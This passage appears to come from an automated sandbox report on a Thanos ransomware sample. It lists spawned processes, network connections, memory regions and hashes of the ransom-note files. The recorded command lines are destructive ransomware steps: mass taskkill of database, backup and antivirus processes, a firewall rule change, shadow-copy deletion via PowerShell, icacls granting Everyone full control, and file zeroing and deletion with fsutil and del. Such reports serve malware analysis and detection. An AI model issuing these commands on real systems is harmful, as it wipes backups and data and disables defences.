"taskkill.exe" /IM mspub.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Thanos.gen-9d85a74f073c4403e3a91017b6757e0368139e672498a2f84f5efaad0d1b573b.exe
C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 13.107.21.200:443 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 52.182.143.210:443 | tcp | |
| US | 8.8.8.8:53 | 96.108.152.52.in-addr.arpa | udp |
Files
memory/2412-132-0x0000000000470000-0x0000000000496000-memory.dmp
memory/2412-133-0x0000000004DE0000-0x0000000004E46000-memory.dmp
memory/2412-134-0x0000000005800000-0x0000000005DA4000-memory.dmp
memory/4484-135-0x0000000000000000-mapping.dmp
memory/3424-136-0x0000000000000000-mapping.dmp
memory/1552-137-0x0000000000000000-mapping.dmp
memory/3984-138-0x0000000000000000-mapping.dmp
memory/2616-139-0x0000000000000000-mapping.dmp
memory/2000-142-0x0000000000000000-mapping.dmp
memory/4292-141-0x0000000000000000-mapping.dmp
memory/228-140-0x0000000000000000-mapping.dmp
memory/4404-143-0x0000000000000000-mapping.dmp
memory/1888-144-0x0000000000000000-mapping.dmp
memory/2336-145-0x0000000000000000-mapping.dmp
memory/1264-146-0x0000000000000000-mapping.dmp
memory/2460-147-0x0000000000000000-mapping.dmp
memory/1600-148-0x0000000000000000-mapping.dmp
memory/1668-149-0x0000000000000000-mapping.dmp
memory/1416-152-0x0000000000000000-mapping.dmp
memory/1168-151-0x0000000000000000-mapping.dmp
memory/2320-150-0x0000000000000000-mapping.dmp
memory/856-153-0x0000000000000000-mapping.dmp
memory/1472-154-0x0000000000000000-mapping.dmp
memory/2340-155-0x0000000000000000-mapping.dmp
memory/1988-156-0x0000000000000000-mapping.dmp
memory/3804-157-0x0000000000000000-mapping.dmp
memory/4060-158-0x0000000000000000-mapping.dmp
memory/2984-159-0x0000000000000000-mapping.dmp
memory/3132-161-0x0000000000000000-mapping.dmp
memory/4992-160-0x0000000000000000-mapping.dmp
memory/3504-162-0x0000000000000000-mapping.dmp
memory/4312-163-0x0000000000000000-mapping.dmp
memory/4800-164-0x0000000000000000-mapping.dmp
memory/1124-165-0x0000000000000000-mapping.dmp
memory/4300-166-0x0000000000000000-mapping.dmp
memory/1244-167-0x0000000000000000-mapping.dmp
memory/4648-168-0x0000000000000000-mapping.dmp
memory/4880-169-0x0000000000000000-mapping.dmp
memory/3756-171-0x0000000000000000-mapping.dmp
memory/956-170-0x0000000000000000-mapping.dmp
memory/3484-172-0x0000000000000000-mapping.dmp
memory/4164-173-0x0000000000000000-mapping.dmp
memory/2936-174-0x0000000000000000-mapping.dmp
memory/4180-175-0x0000000000000000-mapping.dmp
memory/3900-176-0x0000000000000000-mapping.dmp
memory/4336-177-0x0000000000000000-mapping.dmp
memory/4124-178-0x0000000000000000-mapping.dmp
memory/1892-180-0x0000000000000000-mapping.dmp
memory/2976-179-0x0000000000000000-mapping.dmp
memory/2160-181-0x0000000000000000-mapping.dmp
memory/3860-182-0x0000000000000000-mapping.dmp
memory/3204-183-0x0000000000000000-mapping.dmp
memory/1156-184-0x0000000000000000-mapping.dmp
memory/3944-185-0x0000000000000000-mapping.dmp
memory/4952-186-0x0000000000000000-mapping.dmp
memory/3012-187-0x0000000000000000-mapping.dmp
memory/3524-188-0x0000000000000000-mapping.dmp
memory/4296-189-0x0000000000000000-mapping.dmp
memory/4064-190-0x0000000000000000-mapping.dmp
memory/4992-191-0x0000000000000000-mapping.dmp
memory/856-192-0x0000000000000000-mapping.dmp
memory/740-193-0x0000000000000000-mapping.dmp
memory/3980-194-0x0000000000000000-mapping.dmp
memory/5088-195-0x0000000000000000-mapping.dmp
memory/2240-196-0x0000000000000000-mapping.dmp
memory/4740-197-0x0000000000000000-mapping.dmp
memory/4852-198-0x0000000000000000-mapping.dmp
memory/4852-199-0x00000000044E0000-0x0000000004516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
| MD5 | c17a4c4fcc49cfc7f3ba898aa6e88f12 |
| SHA1 | 2a875bf8cc36fd465f0677fe5064ee54ca4cceba |
| SHA256 | 217a13b3d0da16d6ac7b542b5ad42042175b73980f22a3e938cd7ca68f766593 |
| SHA512 | 90dda3d8ae23af0a288bd31739826e3751b0f707574ed6a4f165fc604df1a48e16f06b8390137a75fc8a35b411a4eb1be4debcc6acf1fd07bec663a56fcb966e |
memory/4852-201-0x0000000004CD0000-0x00000000052F8000-memory.dmp
memory/4852-202-0x0000000004C90000-0x0000000004CB2000-memory.dmp
memory/4852-203-0x0000000005370000-0x00000000053D6000-memory.dmp
memory/2412-204-0x0000000006540000-0x00000000065D2000-memory.dmp
memory/4852-205-0x0000000005AC0000-0x0000000005ADE000-memory.dmp
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
| MD5 | aba0c73dabfce266ef8dec5d6278ba31 |
| SHA1 | 112f64243d7980e4101f6a5628f738c190c822b0 |
| SHA256 | fe3df0c197fcaa45fb87d9c59cb570a3f9f134a77e0001d259e3eb05ceace396 |
| SHA512 | 70f5c4aeb7275bc6dfb1290d8520413f004bf88684e1c40400ddcab85e8294ab1bb61e2d9a757f7e572ed9bd11cfec3fb04f2f6eb82b6bb121232b318019353a |